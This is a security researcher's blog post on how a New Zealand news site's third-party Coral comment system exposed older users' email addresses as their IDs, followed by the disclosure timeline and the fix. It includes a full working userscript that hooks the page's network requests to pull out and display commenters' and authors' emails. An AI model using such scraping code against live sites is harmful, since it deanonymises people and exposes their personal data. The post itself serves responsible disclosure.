Featured image of post Lifting PII from a News Website's Comment Section

Lifting PII from a News Website's Comment Section

How a poorly implemented 3rd-party commenting system can leak your personal data.

Update (2024-05-17): The problem has been properly fixed.

Introduction

For better or worse, this news website is one of New Zealand’s most popular online news sources. Its comment section has also garnered a reputation for being one of the most toxic places on the kiwi internet that grandma is likely to stumble across.

About one month ago, this website had a frontend redesign and I made a mental note to have a poke around to see if there were any security flaws. Website redesigns are usually a good source of bugs since so much is changed at once and so the likelihood of something being missed is high. This redesign was no exception; I managed to find three issues with this new website.

I will discuss only one of these issues here since there appears to be a mitigation in place for it. The other issues are still being fixed. Update: This is no longer the case, see Encryption, Stack Traces, and Name Suppression for another problem that has since been fixed.

Your Email Address is Public

This website requires that you create an account before commenting on their stories. This is good since it provides them an easy way to moderate content. When you create an account, you are also given a so-called “commenting username” that is used as your handle when you make a comment.

As you can see, I have no way of changing my own handle either.

This website doesn’t run its own commenting system. Instead it uses a 3rd-party service named Coral to handle all of the comments. This is useful, since they don’t have to maintain an entire commenting system. On the other hand, they lose a bit of flexibility and control over what is returned from Coral.

So, what is returned from Coral? It turns out that not only does the “commenting username” get returned, but also the email that the user signed up with is likely returned as well. This poses a problem for this news website; I bet their users weren’t expecting that.

Proving the Point

I can’t very well file a bug report without creating a proof-of-concept to really drive home how badly this misconfiguration really is. So, I introduce to you, the Comment Deanonymiser userscript (see TamperMonkey for more information about userscripts).

Click to Expand the Source Code
  1
  2
  3
  4
  5
  6
  7
  8
  9
 10
 11
 12
 13
 14
 15
 16
 17
 18
 19
 20
 21
 22
 23
 24
 25
 26
 27
 28
 29
 30
 31
 32
 33
 34
 35
 36
 37
 38
 39
 40
 41
 42
 43
 44
 45
 46
 47
 48
 49
 50
 51
 52
 53
 54
 55
 56
 57
 58
 59
 60
 61
 62
 63
 64
 65
 66
 67
 68
 69
 70
 71
 72
 73
 74
 75
 76
 77
 78
 79
 80
 81
 82
 83
 84
 85
 86
 87
 88
 89
 90
 91
 92
 93
 94
 95
 96
 97
 98
 99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
// ==UserScript==
// @name         Comment Deanonymiser
// @namespace    https://jesse.hacks.nz/
// @version      2024-02-07
// @description  Shows authors' and commenters' email address where available.
// @author       Jesse Sheehan
// @match        https://www.website-name.co.nz/*
// @grant        none
// @run-at       document-start
// ==/UserScript==

(function() {
    'use strict';
    const log = console.log;
    const comments = [];
    let pollHandle = null;
    let commentRoot = null;

    const originalFetch = fetch;
    window.fetch = async function() {
        const response = await originalFetch.apply(this, arguments);

        const url = new URL(response.url);
        if (url.pathname === "/api/graphql" && url.hostname.includes(".coral.coralproject.net")) {
            const content = await response.json();
            response.json = function() {
                return new Promise((resolve) => resolve(content));
            };
            if (content && content.data && content.data.story && content.data.story.comments && content.data.story.comments.edges) {
                const edges = content.data.story.comments.edges;
                // log("handling edges", edges);
                handleLoadedComments(edges);
            } else {
                // log("Could not handle", content);
            }
        }

        return response;
    };

    const originalOpen = XMLHttpRequest.prototype.open;
    XMLHttpRequest.prototype.open = function() {
        this.addEventListener('load', function() {
            if (this.readyState === 4 && this.status.toString().startsWith("2")) {
                handleLoadedResource(this);
            }
        });
        originalOpen.apply(this, arguments);
    };

    window.addEventListener("load", () => {
        document.body.addEventListener("DOMNodeInserted", (event) => {
            if (event.target.nodeName === "#text" || event.target.tagName !== "DIV" || event.target.parentNode.id !== 'coral_thread') return;
            if (pollHandle === null) {
                pollHandle = setInterval(pollShadowRoot, 100);
            }

        }, false);
    });

    function handleLoadedResource(response) {
        const url = new URL(response.responseURL);
        if (/story\/[0-9]+$/.test(url.pathname)) {
            handleLoadedStory(JSON.parse(response.response));
        }
    }

    function handleLoadedStory(content) {
        const authorDetails = content.author;

        if (authorDetails.length === 0) return;

        const parentElement = document.querySelector(".stuff-box.author-names");
        parentElement.replaceChildren();
        for (let author of authorDetails) {
            const child = document.createElement("p");
            const anchor = document.createElement("a");
            anchor.href = `mailto:${author.email}`;
            anchor.innerText = `${author.name} (${author.email})`;
            child.appendChild(anchor);
            parentElement.appendChild(child);
        }
    }

    function handleLoadedComments(edges) {

        edges
            .flatMap(e => [e.node, ...e.node.allChildComments.edges.map(x => x.node)])
            .forEach(comment => comments.push(comment));
        handleCommentsUpdate();

    }

    function pollShadowRoot() {
        if (commentRoot !== null) {
            clearInterval(pollHandle);
            pollHandle = null;
            return;
        }

        const commentParent = document.getElementById("coral_thread");
        //log(commentParent);

        if (commentParent.children.length > 0 && commentParent.querySelector("div").shadowRoot) {

            const shadowRoot = commentParent.querySelector("div").shadowRoot;
            log(shadowRoot);

            let shadowRootPollInterval = setInterval(() => {
                commentRoot = shadowRoot.getElementById("coral");
                if (commentRoot) {
                    commentRoot.addEventListener("DOMNodeInserted", (event) => {
                        handleCommentsUpdate();
                    });
                    clearInterval(shadowRootPollInterval);
                }
            }, 50);

            clearInterval(pollHandle);
            pollHandle = null;
        }
    }

    function handleCommentsUpdate() {
        if (comments.length === 0 || commentRoot === null) return;

        const readyComments = comments.flatMap((comment) => {
            const selector = `#comment-${comment.id}:not([demasked])`;
            const elements = [...commentRoot.querySelectorAll(selector)];

            if (!elements.length) return [];
            return elements.map(element => ([element, comment]));
        });

        readyComments.forEach(([element, comment]) => {

            const usernameElement = element.querySelector("div[class^='Comment-username-']");

            const newChild = document.createElement("div");
            newChild.style.paddingRight = "0.5em";

            const anchor = document.createElement("a");
            if (comment.author.id.includes("@")) {
                anchor.href = "mailto:" + comment.author.id;
            }
            anchor.innerText = comment.author.id;

            newChild.appendChild(anchor);

            usernameElement.parentElement.insertBefore(newChild, usernameElement.parentElement.lastChild);
            element.setAttribute("demasked", "true");
        });

        if (comments.length > 0) {
            setTimeout(handleCommentsUpdate, 1000);
        }
    }
})();

This will extract that delicious PII and display it right next to each comment.

An example of the userscript running. Email addresses redacted for obvious reasons.

It should be noted that not all of this website’s users have their email as their Coral identifier. It seems that if you create a new account today, you will have an integer as your ID. This makes me suspect that only older accounts (probably migrated from their old comment system) are at risk here.

Other Websites

So, does this mean that all the other websites out there that use Coral are also giving out PII like it’s a lolly scramble? Well, no. It doesn’t appear to be the case. Of the several dozen websites that use Coral, it seems that they all use either an integer or a GUID to represent their user’s ID. So it would appear that it is more to do with how this website has chosen to identify their users instead of a flaw inherent in Coral.

NewsTalkZB also uses Coral, but uses GUIDs instead of email addresses for identification.

Disclosure

I reported this issue to the website’s owners on February 7, it was acknowledged on February 8, and it appears that the commenting system was taken down before February 10th. Presumably, they’ve changed the CORS settings for their Coral server as a stop-gap while they remove the PII. I am very happy with how quickly they’ve handled this situation.

The current state of the comments section right now.

Extra: Déjà Vu

Almost 11 years ago, I discovered a similar flaw in this website’s comment section. It was almost exactly the same, in fact. But it had a much more dissatisfying outcome.

The website used to allow users to sign in with a social login (e.g. Twitter/X, Facebook, etc). If a user did this and then commented on an article then the URL of their social media profile would be sent down to everyone who viewed the comment. So I did what I did here: I made a proof-of-concept and submitted my findings. After a phone call and some email back-and-forth a decision was reached!

An email from their editor confirmed that they would just change their terms of service to make this okay. 🤷 I’m glad they are taking the issue more seriously now.

Update (2024-05-17)

It’s been a few months and I’ve noticed that the comments system has been reinstated. A data migration has taken place where the user IDs in Coral have been replaced by the user’s account ID (instead of their email address). This is a welcome change when compared to the error message previously seen when viewing the comments sections. Now you can comment on articles with the confidence that your email isn’t being leaked.

The user IDs have been fixed so that they don't leak information.

Cover photo by Ashni on Unsplash